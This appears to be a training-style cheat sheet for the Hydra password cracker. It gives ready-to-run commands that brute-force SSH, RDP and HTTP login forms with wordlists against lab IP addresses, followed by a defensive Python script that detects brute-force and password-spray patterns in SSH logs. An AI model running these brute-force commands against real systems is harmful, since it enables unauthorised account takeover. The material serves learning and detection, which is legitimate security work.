Hydra

Hydra is an online brute-force password cracking program.

Introduction

  • Hydra is an online brute-force password cracking tool used to quickly "hack" system logins. The options you pass into Hydra depend on the service (protocol) you are attacking.

Commands

  • sudo hydra -l <Username> -P <Password-List> <Service-Name>://<IP-Address> - Brute forces the specified service using the specified username and wordlist.

    • Example 1: sudo hydra -l molly -P /usr/share/wordlists/rockyou.txt ssh://10.10.161.54 - Brute forces SSH on the default port 22.

    • Example 2: sudo hydra -l george -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://192.168.50.201 - Brute forces SSH on port 2222 (-s is used to specify the port number).

    • Example 3: sudo hydra -L /usr/share/wordlists/dirb/others/names.txt -p "SuperS3cure1337#" rdp://192.168.50.202 - Brute forces RDP on its default port number, using a username list (-L) and a single password (-p).

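  • sudo hydra -l <Username> -P <Password-List> <IP-Address> http-post-form "<Login-Path>:<Username-Field>=^USER^&<Password-Field>=^PASS^:<Invalid-Response>" - Brute forces an HTTP POST login form using the specified username and wordlist. The quoted argument has three colon-separated parts: the path of the login page, the POST body (^USER^ and ^PASS^ are replaced with each candidate username and password), and a string that appears in the response to a failed login.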

    • Example 1: sudo hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.161.54 http-post-form "/login:username=^USER^&password=^PASS^:Your username or password is incorrect." -V - Brute forces an HTTP login form that passes the 2 arguments username and password, using the username molly and the rockyou password list (-V prints each attempt).

    • Example 2: sudo hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.50.201 http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid" - Brute forces an HTTP login form that passes the 2 arguments fm_usr and fm_pwd. The username is written directly into the form body here, so only ^PASS^ is substituted.
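The two patterns in the SSH and RDP examples above (one username with a password list, and a username list with one password) leave different traces on the target. The following is an added example, not part of the original page or of Hydra, showing how a defender could tell them apart in OpenSSH auth log lines. The log lines are constructed samples, and the names detect, threshold and SAMPLE are assumptions made for this illustration.

```python
import re
from collections import defaultdict

# OpenSSH sshd password-auth messages: "Failed|Accepted password for [invalid user ]NAME from IP port N"
EVENT = re.compile(
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def detect(lines, threshold=5):
    """Flag source IPs with at least `threshold` failed logins (threshold is an assumed tuning value).

    'brute-force': many passwords against few accounts (the -l ... -P ... pattern)
    'spray':       failures spread over many accounts (the -L ... -p ... pattern)
    """
    failures = defaultdict(list)   # ip -> usernames of failed attempts, in log order
    findings = {}
    for line in lines:
        m = EVENT.search(line)
        if not m:
            continue
        ip, user = m["ip"], m["user"]
        if m["result"] == "Failed":
            failures[ip].append(user)
        elif len(failures[ip]) >= threshold:
            # A success right after a burst of failures: the guess probably worked.
            findings.setdefault(ip, {})["compromised"] = user
    for ip, users in failures.items():
        if len(users) < threshold:
            continue
        distinct = set(users)
        kind = "spray" if len(distinct) >= threshold else "brute-force"
        findings.setdefault(ip, {}).update(kind=kind, failures=len(users), accounts=len(distinct))
    return findings

# Constructed sample lines (documentation IP ranges, made-up accounts), not real logs.
SAMPLE = (
    [f"Jan 10 10:00:{i:02d} host sshd[900]: Failed password for molly from 203.0.113.5 port {40000+i} ssh2" for i in range(8)]
    + ["Jan 10 10:00:09 host sshd[900]: Accepted password for molly from 203.0.113.5 port 40009 ssh2"]
    + [f"Jan 10 10:05:{i:02d} host sshd[901]: Failed password for invalid user user{i} from 198.51.100.7 port {50000+i} ssh2" for i in range(6)]
    + ["Jan 10 10:06:00 host sshd[902]: Failed password for george from 192.0.2.10 port 60000 ssh2",
       "Jan 10 10:06:05 host sshd[902]: Accepted password for george from 192.0.2.10 port 60001 ssh2"]
)

if __name__ == "__main__":
    for ip, info in detect(SAMPLE).items():
        print(ip, info)
```

A source flagged with "compromised" warrants an immediate credential reset for that account; the single mistyped password from 192.0.2.10 stays below the threshold and is not reported.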
